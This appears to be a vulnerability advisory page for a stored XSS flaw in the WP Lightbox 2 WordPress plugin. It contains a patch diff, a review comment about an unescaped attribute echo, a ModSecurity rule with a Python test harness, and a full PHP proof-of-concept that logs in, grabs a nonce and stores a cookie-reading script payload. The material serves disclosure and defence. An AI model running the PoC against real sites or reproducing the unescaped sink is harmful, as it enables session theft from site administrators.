+			</p>
+		</form>
 	<?php
 		$locale = jqlb_get_locale();
 		$diskfile = plugin_dir_path(__FILE__)."I18n/howtouse-{$locale}.html";
-		if (!file_exists($diskfile)){
+		if (!file_exists($diskfile)) {
 			$diskfile = plugin_dir_path(__FILE__).'I18n/howtouse.html';
 		}
 		$text = false;
-		if(function_exists('file_get_contents')){
-			$text = @file_get_contents($diskfile);
+		if(function_exists('file_get_contents')) {
+			$text = file_get_contents($diskfile);
 		} else {
-			$text = @file($diskfile);
-			if($text !== false){
+			$text = file($diskfile);
+			if($text !== false) {
 				$text = implode("", $text);
-		      }
+			}
 		}
-		if($text === false){
-			$text = '<p>The documentation files are missing! Try <a href="http://wordpress.org/extend/plugins/wp-lightbox-2/">downloading</a> and <a href="http://wordpress.org/extend/plugins/wp-lightbox-2/installation/">re-installing</a> this lightbox plugin.</p>';
+		if($text === false) {
+			$text = '<p>The documentation files are missing! Try <a href="https://wordpress.org/extend/plugins/wp-lightbox-2/">downloading</a> and <a href="https://wordpress.org/extend/plugins/wp-lightbox-2/installation/">re-installing</a> this lightbox plugin.</p>';
 		}
 		echo $text;
 	?>
-	</div>
+	</div>
 <?php }
+
 function jqlb_hex2rgba($color, $opacity = false) {

 	$default = 'rgb(0,0,0)';
-	if(empty($color))
-          return $default;

-        if ($color[0] == '#' ) {
-        	$color = substr( $color, 1 );
-        }
-
-        if (strlen($color) == 6) {
-                $hex = array( $color[0] . $color[1], $color[2] . $color[3], $color[4] . $color[5] );
-        } elseif ( strlen( $color ) == 3 ) {
-                $hex = array( $color[0] . $color[0], $color[1] . $color[1], $color[2] . $color[2] );
-        } else {
-                return $default;
-        }
-
-        $rgb =  array_map('hexdec', $hex);
-
-        if($opacity){
-        	if(abs($opacity) > 1)
-        		$opacity = 1.0;
-        	$output = 'rgba('.implode(",",$rgb).','.$opacity.')';
-        } else {
-        	$output = 'rgb('.implode(",",$rgb).')';
-        }
-        return $output;
+	if(empty($color)) {
+		return $default;
+	}
+
+	if ($color[0] == '#' ) {
+		$color = substr( $color, 1 );
+	}
+
+	if (strlen($color) == 6) {
+		$hex = array( $color[0] . $color[1], $color[2] . $color[3], $color[4] . $color[5] );
+	} elseif ( strlen( $color ) == 3 ) {
+		$hex = array( $color[0] . $color[0], $color[1] . $color[1], $color[2] . $color[2] );
+	} else {
+		return $default;
+	}
+
+	$rgb =  array_map('hexdec', $hex);
+
+	if($opacity) {
+		if(abs($opacity) > 1) {
+			$opacity = 1.0;
+		}
+		$output = 'rgba('.implode(",",$rgb).','.$opacity.')';
+	} else {
+		$output = 'rgb('.implode(",",$rgb).')';
+	}
+
+	return $output;
 }
 class wp_lightbox_2{
-	// required variables
-
+
 	private $plugin_url;
-
 	private $plugin_path;
-
 	private $version;
-
+
 	public $options;
-
-	public $parametrs;
-
-	function __construct(){
-
+	public $parametrs;
+
+	public function __construct() {
+
 		$this->plugin_url  = trailingslashit( plugins_url('', __FILE__ ) );
 		$this->plugin_path = trailingslashit( plugin_dir_path( __FILE__ ) );
 		$this->version     = 1.0;
-		require_once($this->plugin_path.'includes/install_database.php');
-		$this->parametrs = new wp_lightbox2_database_params();
+
+		require_once $this->plugin_path . 'includes/install_database.php';
+
+		$this->parametrs = new wp_lightbox2_database_params();
+
 		$this->call_base_filters();
-		$this->create_admin_menu();
+		$this->create_admin_menu();
+	}
+	private function create_admin_menu() {

+		require_once $this->plugin_path.'admin/admin_menu.php';
+
+		$admin_menu = new wp_lightbox_admin_menu( array(
+			'plugin_url'         => $this->plugin_url,
+			'plugin_path'        => $this->plugin_path,
+			'databese_parametrs' => $this->parametrs
+		) );
+
+		add_action('admin_menu', array( $admin_menu, 'create_menu' ) );
 	}
-
-	private function create_admin_menu(){
-
-		require_once($this->plugin_path.'admin/admin_menu.php');
-
-		$admin_menu = new wp_lightbox_admin_menu(array('plugin_url' => $this->plugin_url,'plugin_path' => $this->plugin_path,'databese_parametrs' =>$this->parametrs));
-
-		add_action('admin_menu', array($admin_menu,'create_menu'));
-
-	}
-	public function registr_requeried_scripts(){
-		wp_register_script('angularejs',$this->plugin_url.'admin/scripts/angular.min.js');
-		//wp_register_script('youtube_front_end_api_js',$this->plugin_url.'fornt_end/scripts/youtube_plus_front_end.js',array('jquery'));
-		//wp_register_script('youtube_api_js',"https://www.youtube.com/iframe_api",array('youtube_front_end_api_js'));
-		wp_register_style('admin_style_wp_lightbox',$this->plugin_url.'admin/styles/admin_themplate.css');
-		wp_register_style('jquery-ui-style',$this->plugin_url.'admin/styles/jquery-ui.css');
+	public function registr_requeried_scripts() {
+		wp_register_script('angularejs',$this->plugin_url . 'admin/scripts/angular.min.js');
+		wp_register_style('admin_style_wp_lightbox',$this->plugin_url . 'admin/styles/admin_themplate.css');
+		wp_register_style('jquery-ui-style',$this->plugin_url . 'admin/styles/jquery-ui.css');
 	}
-	public function enqueue_requeried_scripts(){
+	public function enqueue_requeried_scripts() {
 		wp_enqueue_style("jquery-ui-style");
 		wp_enqueue_script("jquery-ui-slider");
 	}
-	public function call_base_filters(){
+	public function call_base_filters() {
 		add_action( 'init',  array($this,'registr_requeried_scripts') );
 		add_action( 'admin_head',  array($this,'enqueue_requeried_scripts') );
 	}
-
-
 }
+
 $wp_lightbox_2 = new wp_lightbox_2();

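Review bot: `jqlb_options_panel` still echoes the help text unescaped into an attribute: `<input type="text" id="jqlb_help_text" name="jqlb_help_text" value="<?php echo get_option('jqlb_help_text'); ?>" size="30" />`. The new `jplb_help_kses` callback (`wp_kses_post`) only filters tags and attributes inside `<...>`; it does not encode a bare double quote, so it is not a substitute for output escaping in attribute context. Wrap the value in `esc_attr()`. Note also that nothing in this patch hooks `jqlb_register_menu_item` any more (the `add_action('admin_menu', ...)` for it was removed), so if this legacy panel is dead code it should be deleted rather than shipped with an unescaped sink.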
ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-1430
# REQUEST_URI carries the query string, so "@streq" against the bare path could
# never match a request with "?action=..."; match on REQUEST_FILENAME instead and
# accept the action argument from either the query string or the POST body.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
  "id:10001430,phase:2,deny,status:403,chain,msg:'CVE-2026-1430: WP Lightbox 2 Stored XSS via AJAX',severity:'CRITICAL',tag:'CVE-2026-1430',tag:'WordPress',tag:'Plugin/WP-Lightbox-2',tag:'attack/xss'"
  SecRule ARGS:action "@streq save_in_databese_lightbox2" "chain"
    SecRule ARGS_POST:jqlb_help_text "@rx [<>'\"].*[<>'\"]" \
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E,logdata:'Matched %{MATCHED_VAR}'"

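To see which requests the rule above would actually deny, here is an added example (not Atomic Edge's or the plugin's code) that models the chain's three conditions in Python and runs them over constructed requests. It assumes ModSecurity 2.x semantics for the transformations, approximated with the standard library, and reads the action argument from either the query string or the POST body.

```python
"""Offline evaluation of the CVE-2026-1430 ModSecurity chain over constructed requests.

Added example, not Atomic Edge's or the plugin's code. It re-implements the three
chained SecRule conditions in plain Python (no ModSecurity install needed) so the
rule's behaviour can be checked before deployment. Assumptions: ModSecurity 2.x
semantics for t:urlDecodeUni / t:htmlEntityDecode / t:lowercase, approximated with
urllib and html; the action argument is accepted from the query string or the body.
"""
import html
import re
from urllib.parse import parse_qs, unquote

AJAX_PATH = "/wp-admin/admin-ajax.php"
TARGET_ACTION = "save_in_databese_lightbox2"   # the plugin's (misspelled) AJAX action name
# Same regex as the rule's final SecRule: two tag/attribute delimiters anywhere in the value.
HELP_TEXT_PATTERN = re.compile(r"""[<>'"].*[<>'"]""")


def transform(value: str) -> str:
    """t:urlDecodeUni, t:htmlEntityDecode, t:lowercase applied to an ARGS value.

    ModSecurity populates ARGS with URL-decoded values, so the transformation chain
    decodes a second time; that is what lets the rule see through double-encoded input.
    """
    return html.unescape(unquote(value)).lower()


def rule_matches(method: str, uri: str, body: str = "") -> bool:
    """Return True when the chained rule fires (deny, status 403) for this request."""
    path, _, query = uri.partition("?")
    if not path.endswith(AJAX_PATH):                      # REQUEST_FILENAME @endsWith
        return False
    get_args = parse_qs(query, keep_blank_values=True)
    post_args = parse_qs(body, keep_blank_values=True) if method.upper() == "POST" else {}
    action = (post_args.get("action") or get_args.get("action") or [None])[0]
    if action != TARGET_ACTION:                           # ARGS:action @streq
        return False
    # ARGS_POST:jqlb_help_text @rx, evaluated after the transformations above
    return any(HELP_TEXT_PATTERN.search(transform(v))
               for v in post_args.get("jqlb_help_text", []))


# Constructed sample requests (not captured traffic); the payload is the advisory's own.
SAMPLES = [
    ("benign help text",
     "POST", AJAX_PATH,
     "action=save_in_databese_lightbox2&jqlb_help_text=Click+an+image+to+enlarge+it"),
    ("advisory payload, form-encoded",
     "POST", AJAX_PATH,
     "action=save_in_databese_lightbox2&jqlb_help_text=%27%3Ealert%28document.cookie%29"),
    ("advisory payload, action in query string",
     "POST", AJAX_PATH + "?action=save_in_databese_lightbox2",
     "jqlb_help_text=%27%3Ealert%28document.cookie%29"),
    ("advisory payload, double URL-encoded",
     "POST", AJAX_PATH,
     "action=save_in_databese_lightbox2&jqlb_help_text=%2527%253Ealert%2528document.cookie%2529"),
    ("unrelated AJAX action with the same value",
     "POST", AJAX_PATH,
     "action=heartbeat&jqlb_help_text=%27%3Ealert%28document.cookie%29"),
    ("same body against a different endpoint",
     "POST", "/wp-admin/admin-post.php",
     "action=save_in_databese_lightbox2&jqlb_help_text=%27%3Ealert%28document.cookie%29"),
]


def run_samples() -> dict:
    """Map each sample name to whether the rule would deny it."""
    return {name: rule_matches(m, u, b) for name, m, u, b in SAMPLES}


if __name__ == "__main__":
    for name, denied in run_samples().items():
        print(f"{'DENY ' if denied else 'allow'}  {name}")
```

The "benign help text" sample shows the rule passes ordinary settings saves, while the double-encoded sample shows why the extra `t:urlDecodeUni` pass matters.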
Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1430 - WP Lightbox 2 < 3.0.7 - Authenticated (Administrator+) Stored Cross-Site Scripting

/**
 * WP Lightbox 2 Stored XSS Proof of Concept
 * Requires valid administrator credentials and a valid nonce from the settings page.
 */

$target_url = 'https://vulnerable-wordpress-site.com'; // CHANGE THIS
$username = 'admin'; // CHANGE THIS - Administrator username
$password = 'password'; // CHANGE THIS - Administrator password
$payload = '"><script>alert(`Atomic Edge XSS: ${document.cookie}`)</script>'; // XSS payload

// Step 1: Authenticate and get session cookies
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-login.php',
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_COOKIEJAR => '/tmp/cookies.txt',
    CURLOPT_COOKIEFILE => '/tmp/cookies.txt',
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_HEADER => true
]);
$response = curl_exec($ch);

// Step 2: Visit the WP Lightbox 2 settings page to obtain a valid nonce
// CURLOPT_HTTPGET switches the reused handle back to GET; re-setting
// CURLOPT_POSTFIELDS (even to an empty value) would keep it as a POST.
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-admin/admin.php?page=WP-Lightbox-2',
    CURLOPT_HTTPGET => true,
    CURLOPT_HEADER => false
]);
$settings_page = curl_exec($ch);

// Step 3: Extract the nonce from the page (wp_lightbox_2_general_settings_page)
if (preg_match('/name="wp_lightbox_2_general_settings_page" value="([a-f0-9]+)"/', $settings_page, $matches)) {
    $nonce = $matches[1];
    echo "[+] Found nonce: $nonce\n";

    // Step 4: Send the malicious AJAX request with XSS payload
    $ajax_url = $target_url . '/wp-admin/admin-ajax.php?action=save_in_databese_lightbox2';
    $post_data = [
        'wp_lightbox_2_general_settings_page' => $nonce,
        'jqlb_overlay_opacity' => '80',
        'jqlb_help_text' => $payload, // Vulnerable parameter
        'jqlb_margin_size' => '0',
        'jqlb_automate' => '1',
        'jqlb_comments' => '1',
        'jqlb_resize_on_demand' => '0',
        'jqlb_show_download' => '0',
        'jqlb_navbarOnTop' => '0',
        'jqlb_resize_speed' => '400'
    ];

    curl_setopt_array($ch, [
        CURLOPT_URL => $ajax_url,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query($post_data),
        CURLOPT_RETURNTRANSFER => true
    ]);

    $ajax_response = curl_exec($ch);

    if (strpos($ajax_response, 'sax_normala') !== false) {
        echo "[+] Payload successfully stored!\n";
        echo "[+] Visit $target_url/wp-admin/admin.php?page=WP-Lightbox-2 to trigger the XSS.\n";
    } else {
        echo "[-] Failed to store payload. Response: $ajax_response\n";
    }
} else {
    echo "[-] Could not extract nonce from settings page\n";
}

curl_close($ch);
?>
